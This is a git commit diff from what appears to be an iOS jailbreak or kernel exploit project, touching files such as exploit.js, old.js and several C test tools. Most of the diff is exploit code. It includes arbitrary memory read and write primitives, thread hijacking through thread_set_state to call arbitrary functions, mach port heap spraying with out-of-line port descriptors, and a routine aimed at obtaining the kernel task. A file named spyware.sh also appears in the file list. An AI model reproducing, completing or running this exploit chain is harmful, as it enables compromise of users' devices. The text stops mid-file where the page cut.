summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorspv <aquaticvegetable@gmail.com>2022-04-24 21:30:15 -0400
committerspv <aquaticvegetable@gmail.com>2022-04-24 21:30:15 -0400
commit7de438565f03123d37f737d2cd905579e90bc21e (patch)
tree2459045c6f8035aac6340361170142a144c0274f
parent5f9294a0e7aac5b9e105ccee737e42fc5c4cff63 (diff)
yeet
Diffstat
-rwxr-xr-x[-rw-r--r--]build.sh0
-rwxr-xr-x[-rw-r--r--]build_native.sh0
-rwxr-xr-x[-rw-r--r--]exploit.conf0
-rwxr-xr-x[-rw-r--r--]install.sh0
-rwxr-xr-x[-rw-r--r--]install_native.sh0
-rwxr-xr-x[-rw-r--r--]launch.json10
-rwxr-xr-x[-rw-r--r--]old.js138
-rwxr-xr-x[-rw-r--r--]spyware.sh0
-rwxr-xr-x[-rw-r--r--]src/gen/common.h0
-rwxr-xr-x[-rw-r--r--]src/gen/ip_tools.c0
-rwxr-xr-x[-rw-r--r--]src/gen/ip_tools.h0
-rwxr-xr-x[-rw-r--r--]src/gen/patchfinder.h0
-rw-r--r--src/gen/shit.c62
-rw-r--r--src/gen/shit.h10
-rwxr-xr-x[-rw-r--r--]src/gen/stage0_primitives.c0
-rwxr-xr-x[-rw-r--r--]src/gen/stage0_primitives.h0
-rwxr-xr-x[-rw-r--r--]src/gen/stage1_primitives.c0
-rwxr-xr-x[-rw-r--r--]src/gen/stage1_primitives.h0
-rwxr-xr-x[-rw-r--r--]src/js/kexp/exploit.js79
-rwxr-xr-x[-rw-r--r--]src/js/lib/myutils.js6
-rw-r--r--src/js/main.js13
-rw-r--r--src/js/primitives/call.js25
-rw-r--r--src/js/primitives/mem.js15
-rwxr-xr-x[-rw-r--r--]tools/backup.c150
-rwxr-xr-x[-rw-r--r--]tools/build.sh0
-rwxr-xr-x[-rw-r--r--]tools/build_native.sh0
-rwxr-xr-x[-rw-r--r--]tools/ent.xml0
-rwxr-xr-x[-rw-r--r--]tools/fuck_aslr.c0
-rwxr-xr-x[-rw-r--r--]tools/fuck_ptr.c0
-rwxr-xr-x[-rw-r--r--]tools/jit_all_the_things.c0
-rwxr-xr-x[-rw-r--r--]tools/shit.c124
-rwxr-xr-x[-rw-r--r--]tools/test.c0
-rwxr-xr-x[-rw-r--r--]tools/testlol.c198
-rwxr-xr-x[-rw-r--r--]tools/thread_shit.c0
34 files changed, 454 insertions, 376 deletions
diff --git a/build.sh b/build.sh
index c8e28bf..c8e28bf 100644..100755
--- a/build.sh
+++ b/build.sh
diff --git a/build_native.sh b/build_native.sh
index a349643..a349643 100644..100755
--- a/build_native.sh
+++ b/build_native.sh
diff --git a/exploit.conf b/exploit.conf
index 8bf3bf1..8bf3bf1 100644..100755
--- a/exploit.conf
+++ b/exploit.conf
diff --git a/install.sh b/install.sh
index 3dcfb9c..3dcfb9c 100644..100755
--- a/install.sh
+++ b/install.sh
diff --git a/install_native.sh b/install_native.sh
index 325515a..325515a 100644..100755
--- a/install_native.sh
+++ b/install_native.sh
diff --git a/launch.json b/launch.json
index c2fecf3..1a7df09 100644..100755
--- a/launch.json
+++ b/launch.json
@@ -1,6 +1,6 @@
-{
- "name": "Launch",
- "type": "lldb",
- "request": "launch",
- "program": "${workspaceFolder}/tools/bin/thread_shit"
+{
+ "name": "Launch",
+ "type": "lldb",
+ "request": "launch",
+ "program": "${workspaceFolder}/tools/bin/thread_shit"
} \ No newline at end of file
diff --git a/old.js b/old.js
index 2dd0509..ce19c94 100644..100755
--- a/old.js
+++ b/old.js
@@ -1,70 +1,70 @@
-var dyld_shc_slide = get_dyld_shc_slide();
-
- printf("still alive0\n");
- write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide);
- printf("still alive1\n");
- write_u32(stack_shit + 0x0, 0x42069);
- printf("still alive2\n");
- write_u32(stack_shit + 0x1, 0x69420);
- printf("still alive3\n");
- write_u32(stack_shit + 0x2, 0x13371337);
- printf("still alive4\n");
- write_u32(stack_shit + 0x3, 0x6969);
- printf("still alive5\n");
-
- printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
- calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0);
- printf("%x\n", read_u32(threadptr));
- thread = read_u32(threadptr);
- calls4arg("usleep", 100000, 0, 0, 0);
- printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
-// call4arg(0x41414141, 0, 0, 0, 0);
- printf("still alive6\n");
- write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
-// write_u32(th, 0xa03);
- printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]);
-
- var info = 0x134004;
- var whatever = 0x134000;
-
- /*
- var lol = new Uint8Array(0x100);
-
- for (i = 0; i < 0x10000; i++) {
- write_buf(info, lol, 0x100);
- write_u32(whatever, 0x100)
-// printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0));
- calls4arg("thread_info", i, 3, info, whatever);
-// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
- if (read_u32(info) != 0) {
-// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
- printf("hit: %x\n", i);
- } else if (i % 0x10 == 0) {
- printf("%x\n", i);
- }
- }*/
-
- printf("still alive7\n");
- write_u32(thread_state + (0 << 2), sptr("Hello, world! %x %x %x %x %x %x %x\n"));
- printf("still alive8\n");
- write_u32(thread_state + (1 << 2), 0x1337);
- printf("still alive9\n");
- write_u32(thread_state + (2 << 2), 0x420);
- printf("still alive10\n");
- write_u32(thread_state + (3 << 2), 0x69);
- printf("still alive11\n");
- write_u32(thread_state + (13 << 2), stack_shit);
- printf("still alive12\n");
- write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide);
- printf("still alive13\n");
- write_u32(thread_state + (15 << 2), sym_cache["printf"]);
- printf("still alive14\n");
- write_u32(thread_state + (16 << 2), 0x40000020);
-
- printf("still alive15\n");
- printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT));
- printf("still alive16\n");
- printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0));
- printf("still alive17\n");
-
+var dyld_shc_slide = get_dyld_shc_slide();
+
+ printf("still alive0\n");
+ write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide);
+ printf("still alive1\n");
+ write_u32(stack_shit + 0x0, 0x42069);
+ printf("still alive2\n");
+ write_u32(stack_shit + 0x1, 0x69420);
+ printf("still alive3\n");
+ write_u32(stack_shit + 0x2, 0x13371337);
+ printf("still alive4\n");
+ write_u32(stack_shit + 0x3, 0x6969);
+ printf("still alive5\n");
+
+ printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
+ calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0);
+ printf("%x\n", read_u32(threadptr));
+ thread = read_u32(threadptr);
+ calls4arg("usleep", 100000, 0, 0, 0);
+ printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
+// call4arg(0x41414141, 0, 0, 0, 0);
+ printf("still alive6\n");
+ write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+// write_u32(th, 0xa03);
+ printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]);
+
+ var info = 0x134004;
+ var whatever = 0x134000;
+
+ /*
+ var lol = new Uint8Array(0x100);
+
+ for (i = 0; i < 0x10000; i++) {
+ write_buf(info, lol, 0x100);
+ write_u32(whatever, 0x100)
+// printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0));
+ calls4arg("thread_info", i, 3, info, whatever);
+// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
+ if (read_u32(info) != 0) {
+// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
+ printf("hit: %x\n", i);
+ } else if (i % 0x10 == 0) {
+ printf("%x\n", i);
+ }
+ }*/
+
+ printf("still alive7\n");
+ write_u32(thread_state + (0 << 2), sptr("Hello, world! %x %x %x %x %x %x %x\n"));
+ printf("still alive8\n");
+ write_u32(thread_state + (1 << 2), 0x1337);
+ printf("still alive9\n");
+ write_u32(thread_state + (2 << 2), 0x420);
+ printf("still alive10\n");
+ write_u32(thread_state + (3 << 2), 0x69);
+ printf("still alive11\n");
+ write_u32(thread_state + (13 << 2), stack_shit);
+ printf("still alive12\n");
+ write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide);
+ printf("still alive13\n");
+ write_u32(thread_state + (15 << 2), sym_cache["printf"]);
+ printf("still alive14\n");
+ write_u32(thread_state + (16 << 2), 0x40000020);
+
+ printf("still alive15\n");
+ printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT));
+ printf("still alive16\n");
+ printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0));
+ printf("still alive17\n");
+
calls4arg("sleep", 10, 0, 0, 0); \ No newline at end of file
diff --git a/spyware.sh b/spyware.sh
index dac5939..dac5939 100644..100755
--- a/spyware.sh
+++ b/spyware.sh
diff --git a/src/gen/common.h b/src/gen/common.h
index 9550400..9550400 100644..100755
--- a/src/gen/common.h
+++ b/src/gen/common.h
diff --git a/src/gen/ip_tools.c b/src/gen/ip_tools.c
index 6e36b64..6e36b64 100644..100755
--- a/src/gen/ip_tools.c
+++ b/src/gen/ip_tools.c
diff --git a/src/gen/ip_tools.h b/src/gen/ip_tools.h
index a011094..a011094 100644..100755
--- a/src/gen/ip_tools.h
+++ b/src/gen/ip_tools.h
diff --git a/src/gen/patchfinder.h b/src/gen/patchfinder.h
index 21af7e3..21af7e3 100644..100755
--- a/src/gen/patchfinder.h
+++ b/src/gen/patchfinder.h
diff --git a/src/gen/shit.c b/src/gen/shit.c
index 6e6c5c5..ef354d4 100644
--- a/src/gen/shit.c
+++ b/src/gen/shit.c
@@ -1,32 +1,32 @@
-#include <stdarg.h>
-#include "common.h"
-#include <stdio.h>
-#include "shit.h"
-
-extern FILE* fp;
-
-int _asprintf(char **strp, const char *fmt, ...) {
- va_list ap;
- char* tmp = NULL;
-
- *strp = "";
-
- /*
- * shit
- */
-
- va_start(ap, fmt);
- vfprintf(fp, fmt, ap);
- va_end(ap);
-
-#if 0
- strcpy(fuck_memory_leaks, tmp);
-
- if (strp)
- *strp = fuck_memory_leaks;
-
- free(tmp);
-#endif
-
- return 0;
+#include <stdarg.h>
+#include "common.h"
+#include <stdio.h>
+#include "shit.h"
+
+extern FILE* fp;
+
+int _asprintf(char **strp, const char *fmt, ...) {
+ va_list ap;
+ char* tmp = NULL;
+
+ *strp = "";
+
+ /*
+ * shit
+ */
+
+ va_start(ap, fmt);
+ vfprintf(fp, fmt, ap);
+ va_end(ap);
+
+#if 0
+ strcpy(fuck_memory_leaks, tmp);
+
+ if (strp)
+ *strp = fuck_memory_leaks;
+
+ free(tmp);
+#endif
+
+ return 0;
} \ No newline at end of file
diff --git a/src/gen/shit.h b/src/gen/shit.h
index aaa4b7f..d97a995 100644
--- a/src/gen/shit.h
+++ b/src/gen/shit.h
@@ -1,6 +1,6 @@
-#ifndef SHIT_H
-#define SHIT_H
-
-int _asprintf(char **strp, const char *fmt, ...);
-
+#ifndef SHIT_H
+#define SHIT_H
+
+int _asprintf(char **strp, const char *fmt, ...);
+
#endif \ No newline at end of file
diff --git a/src/gen/stage0_primitives.c b/src/gen/stage0_primitives.c
index b54cb1a..b54cb1a 100644..100755
--- a/src/gen/stage0_primitives.c
+++ b/src/gen/stage0_primitives.c
diff --git a/src/gen/stage0_primitives.h b/src/gen/stage0_primitives.h
index a9a71eb..a9a71eb 100644..100755
--- a/src/gen/stage0_primitives.h
+++ b/src/gen/stage0_primitives.h
diff --git a/src/gen/stage1_primitives.c b/src/gen/stage1_primitives.c
index ffe7b53..ffe7b53 100644..100755
--- a/src/gen/stage1_primitives.c
+++ b/src/gen/stage1_primitives.c
diff --git a/src/gen/stage1_primitives.h b/src/gen/stage1_primitives.h
index d6b9c33..d6b9c33 100644..100755
--- a/src/gen/stage1_primitives.h
+++ b/src/gen/stage1_primitives.h
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index c28e59c..e0ef574 100644..100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
var req_init_port_set_address = 0x0
var req_init_port_set_count = 0x4
+var task_self = 0;
var kslide = 0;
var fakeportData = 0;
@@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) {
function copyinPort(kport, cnt) {
var err = malloc(4);
var ret = 0;
- var self = mach_task_self();
+ var self = task_self;
var service = MACH_PORT_NULL;
var client = malloc(4);
var it = malloc(4);
@@ -180,23 +181,43 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports\n");
+ printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp);
- mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
+ mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
}
var mp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp);
- printf("%x\n", read_u32(mp));
- mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
+ var rmp = read_u32(mp);
+ mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
- send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ send_ports(rmp, read_u32(kp), 2, number_port_descs);
return mp;
}
+function fast_log2(n) {
+ var i = 0;
+ while (n >>= 1) {
+ i++;
+ }
+
+ return i;
+}
+
+function fast_array_mul(arr, n) {
+ var tmp_arr = arr;
+ var done = 0;
+ for (var i = 0; i < fast_log2(n) + 2; i++) {
+ tmp_arr = tmp_arr.concat(tmp_arr);
+ done = (1 << i);
+ }
+
+ return tmp_arr;
+}
+
function send_ports(target, payload, num, number_port_descs) {
var init_port_set = malloc(num * 4);
@@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) {
write_u32(init_port_set + (i << 2), payload);
}
- var buf = malloc(0x1c + (number_port_descs * 0xc));
+ var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+
write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+ var new_buf_ = new Array();
+ var tmp = u32_to_u8x4(init_port_set);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ tmp = u32_to_u8x4(num);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ new_buf_.push(0);
+ new_buf_.push(0);
+ new_buf_.push(19);
+ new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+
+ var new_buf = fast_array_mul(new_buf_, number_port_descs);
+
+ fast_write_buf(buf + req_init_port_set, new_buf);
+
+ /*
for (var i = 0; i < number_port_descs; i++) {
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
- }
+ }*/
write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
write_u32(buf + req_head_msgh_request_port, target);
write_u32(buf + req_head_msgh_reply_port, 0);
write_u32(buf + req_head_msgh_id, 1337);
- return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+
+ free(buf);
+
+ printf("%d %s\n", ret, mach_error_string(ret));
+
+ return ret;
}
function get_kernel_task() {
@@ -229,11 +278,13 @@ function get_kernel_task() {
sanity_port = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port);
- mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
+ task_self = mach_task_self();
+
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port);
+ mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
limits = malloc(4);
write_u32(limits, 1000);
- mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
+ mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
printf("starting exploit\n");
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 51fc055..325c490 100644..100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -112,4 +112,8 @@ var io_service_open_extended = scall_wrapper("io_service_open_extended");
var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator");
var IOIteratorNext = scall_wrapper("IOIteratorNext");
var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty");
-var mach_msg = scall_wrapper("mach_msg"); \ No newline at end of file
+var mach_msg = scall_wrapper("mach_msg");
+var mmap = scall_wrapper("mmap");
+var free = scall_wrapper("free");
+var mlock = scall_wrapper("mlock");
+var mprotect = scall_wrapper("mprotect"); \ No newline at end of file
diff --git a/src/js/main.js b/src/js/main.js
index 4d978ef..ee0a627 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -12,6 +12,13 @@ var ARM_THREAD_STATE_COUNT = 0x11;
var ARM_THREAD_STATE = 0x1;
var LOG_SYSLOG = 0x28;
+var PROT_READ = 0x1;
+var PROT_WRITE = 0x2;
+var PROT_EXEC = 0x4;
+
+var MAP_PRIVATE = 0x2;
+var MAP_ANON = 0x1000;
+
try {
puts("we out here in jsc");
} catch (e) {
@@ -22,10 +29,6 @@ try {
puts = function (){};
}
-function csbypass() {
-
-}
-
function main() {
/*
* get slide and calculate slid base
@@ -45,8 +48,6 @@ function main() {
puts("we out here");
puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
-// csbypass();
-
printf("slide=0x%x\n", slide);
printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 97a47b6..e382470 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -118,6 +118,8 @@ function calls4arg(sym, r0, r1, r2, r3) {
return call4arg(addy, r0, r1, r2, r3);
}
+var rth = 0;
+
function callnarg() {
if (arguments.length < 1) {
return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
@@ -153,8 +155,15 @@ function callnarg() {
calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
thread = read_u32(threadptr);
write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+ rth = read_u32(th);
+ }
+
+ if (rth === 0) {
+ rth = read_u32(th);
}
+// calls4arg("thread_suspend", rth, 0, 0, 0);
+
/*
* write first 4 to r0-r3, rest to stack
*/
@@ -198,12 +207,8 @@ function callnarg() {
/*
* set the state
*/
- calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
-
- /*
- * probably un-necessary now, keeping in just in case for now
- */
- calls4arg("thread_resume", read_u32(th), 0, 0, 0);
+ calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
+ calls4arg("thread_resume", rth, 0, 0, 0);
/*
* spin wait for return
@@ -212,15 +217,15 @@ function callnarg() {
/*
* reset, it's used as input for thread_state size
*/
- write_u32(count, 0x100);
- calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count);
+ write_u32(count, 17);
+ calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
/*
* if the pc is in (resolver, resolver + 8), suspend the thread
* (to not spin endlessly), read r0 and return
*/
if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) {
- calls4arg("thread_suspend", read_u32(th), 0, 0, 0);
+ calls4arg("thread_suspend", rth, 0, 0, 0);
return read_u32(thread_state);
}
@@ -262,7 +267,7 @@ function scall() {
args_to_pass.push(sptr(arguments[i]));
} else {
args_to_pass.push(arguments[i]);
- if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) {
+ if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000) && (i == 1 || i == 3)) {
force_callnarg = true;
}
}
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 85cd132..ff12fdd 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -91,6 +91,21 @@ function write_u32_buf(addy, buf, len) {
return buf;
}
+function fast_write_buf(addy, buf) {
+ var upper_i = Math.floor(buf.length / 0x100);
+
+ for (var i = 0; i < upper_i; i++) {
+ u8x4 = u32_to_u8x4(addy + (i * 0x100));
+ parent[VECTOR_OFFSET + 0x0] = u8x4[0];
+ parent[VECTOR_OFFSET + 0x1] = u8x4[1];
+ parent[VECTOR_OFFSET + 0x2] = u8x4[2];
+ parent[VECTOR_OFFSET + 0x3] = u8x4[3];
+ for (var j = (i * 0x100); (j < (i * 0x100) + 0x100) && (j < buf.length); j++) {
+ child[j % 0x100] = buf[j];
+ }
+ }
+}
+
/*
* write uint8_t
*/
diff --git a/tools/backup.c b/tools/backup.c
index 1ed9921..c1472a3 100644..100755
--- a/tools/backup.c
+++ b/tools/backup.c
@@ -1,76 +1,76 @@
-#include <mach/mach.h>
-#include <sys/mman.h>
-#include <pthread.h>
-#include <stdio.h>
-#include <dlfcn.h>
-
-void lol(void) {
- puts("hello?");
-// *(uint32_t*)0x41424344 = 0;
-}
-
-void* lol2(void* arg) {
- while (1) ;;
-}
-
-int main(int argc, char* argv[]) {
- kern_return_t kr;
- thread_t th;
- mach_port_name_t mytask, mythread;
- printf("Hello, world!\n");
- mytask = mach_task_self();
- mythread = mach_thread_self();
-
- mmap(0x2000000, 0x100000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, 0, 0);
-
- char* test = malloc(0x100);
- strcpy(test, "Hello, world! %x %x %x %x %x %x %x\n");
-
- pthread_t thread;
- pthread_create(&thread, NULL, lol2, NULL);
-
- puts("test");
-
-// thread_create(mytask, &th);
- th = pthread_mach_thread_np(thread);
- printf("%x\n", mytask);
- arm_thread_state_t state;
- mach_msg_type_number_t count;
- kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count);
-
- uint32_t* stack_above = 0x2001000;
- stack_above[0] = 0x42069;
- stack_above[1] = 0x69420;
- stack_above[3] = 0x13371337;
- stack_above[4] = 0x6969;
-
-// fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts"));
-
-// exit(42);
-
-// *(uint32_t*)0x41414141 = 0;
-
-// memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t));
-
- for (int i = 0; i < 13; i++) {
- fprintf(stderr, "r%d=%x\n", i, state.__r[i]);
- }
-
- *(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000;
-
- state.__r[0] = test;
- state.__r[1] = 0x1337;
- state.__r[2] = 0x420;
- state.__r[3] = 0x69;
- state.__sp = (uint32_t)stack_above;
- state.__lr = 0x23d751fc + 0x1b4c000;
- state.__pc = ((uint32_t)dlsym(RTLD_DEFAULT, "printf")) | 1;
- state.__cpsr = 0x40000020;
- kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT);
- kr = thread_resume(th);
-// thread_call_enter((thread_call_func_t)&lol);
-
- sleep(1);
-
- return 0;
+#include <mach/mach.h>
+#include <sys/mman.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <dlfcn.h>
+
+void lol(void) {
+ puts("hello?");
+// *(uint32_t*)0x41424344 = 0;
+}
+
+void* lol2(void* arg) {
+ while (1) ;;
+}
+
+int main(int argc, char* argv[]) {
+ kern_return_t kr;
+ thread_t th;
+ mach_port_name_t mytask, mythread;
+ printf("Hello, world!\n");
+ mytask = mach_task_self();
+ mythread = mach_thread_self();
+
+ mmap(0x2000000, 0x100000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, 0, 0);
+
+ char* test = malloc(0x100);
+ strcpy(test, "Hello, world! %x %x %x %x %x %x %x\n");
+
+ pthread_t thread;
+ pthread_create(&thread, NULL, lol2, NULL);
+
+ puts("test");
+
+// thread_create(mytask, &th);
+ th = pthread_mach_thread_np(thread);
+ printf("%x\n", mytask);
+ arm_thread_state_t state;
+ mach_msg_type_number_t count;
+ kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count);
+
+ uint32_t* stack_above = 0x2001000;
+ stack_above[0] = 0x42069;
+ stack_above[1] = 0x69420;
+ stack_above[3] = 0x13371337;
+ stack_above[4] = 0x6969;
+
+// fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts"));
+
+// exit(42);
+
+// *(uint32_t*)0x41414141 = 0;
+
+// memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t));
+
+ for (int i = 0; i < 13; i++) {
+ fprintf(stderr, "r%d=%x\n", i, state.__r[i]);
+ }
+
+ *(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000;
+
+ state.__r[0] = test;
+ state.__r[1] = 0x1337;
+ state.__r[2] = 0x420;
+ state.__r[3] = 0x69;
+ state.__sp = (uint32_t)stack_above;
+ state.__lr = 0x23d751fc + 0x1b4c000;
+ state.__pc = ((uint32_t)dlsym(RTLD_DEFAULT, "printf")) | 1;
+ state.__cpsr = 0x40000020;
+ kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT);
+ kr = thread_resume(th);
+// thread_call_enter((thread_call_func_t)&lol);
+
+ sleep(1);
+
+ return 0;
} \ No newline at end of file
diff --git a/tools/build.sh b/tools/build.sh
index 37f29b3..37f29b3 100644..100755
--- a/tools/build.sh
+++ b/tools/build.sh
diff --git a/tools/build_native.sh b/tools/build_native.sh
index 896562a..896562a 100644..100755
--- a/tools/build_native.sh
+++ b/tools/build_native.sh
diff --git a/tools/ent.xml b/tools/ent.xml
index 2973d1d..2973d1d 100644..100755
--- a/tools/ent.xml
+++ b/tools/ent.xml
diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c
index c8e9714..c8e9714 100644..100755
--- a/tools/fuck_aslr.c
+++ b/tools/fuck_aslr.c
diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c
index 25eab56..25eab56 100644..100755
--- a/tools/fuck_ptr.c
+++ b/tools/fuck_ptr.c
diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c
index d955ea1..d955ea1 100644..100755
--- a/tools/jit_all_the_things.c
+++ b/tools/jit_all_the_things.c
diff --git a/tools/shit.c b/tools/shit.c
index 6fa80d4..1fe00cd 100644..100755
--- a/tools/shit.c
+++ b/tools/shit.c
@@ -1,63 +1,63 @@
-#include <mach/mach.h>
-#include <sys/mman.h>
-#include <stdio.h>
-
-int main(int argc, char* argv[]) {
- kern_return_t kr;
- thread_t th;
- mach_port_name_t mytask, mythread;
- arm_thread_state_t state;
- mach_msg_type_number_t count;
- printf("Hello, world!\n");
- mytask = mach_task_self();
- mythread = mach_thread_self();
-
- printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
- mmap(0x1300000, 0x100000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);
- printf("%x %x %x %x %x %x %x %x %x %x %x %x\n", mytask, &th, th, &state, &count, 0x41414141);
-
- *(uint32_t*)0x1301004 = 0x1300100;
- *(uint32_t*)0x1301008 = 0x1300200;
- *(uint32_t*)0x1301000 = 0x1300000;
-
- *(uint32_t*)0x1302000 = 0x1301000;
- *(uint32_t*)0x1302004 = 0x1301004;
- *(uint32_t*)0x1302008 = 0x1301008;
-
- *(uint32_t*)0x1304008 = 0x1303008;
- *(uint32_t*)0x1305008 = 0x1304008;
-
- printf("%d(%x) %d(%x)\n", ARM_THREAD_STATE, ARM_THREAD_STATE, ARM_THREAD_STATE_COUNT, ARM_THREAD_STATE_COUNT);
-
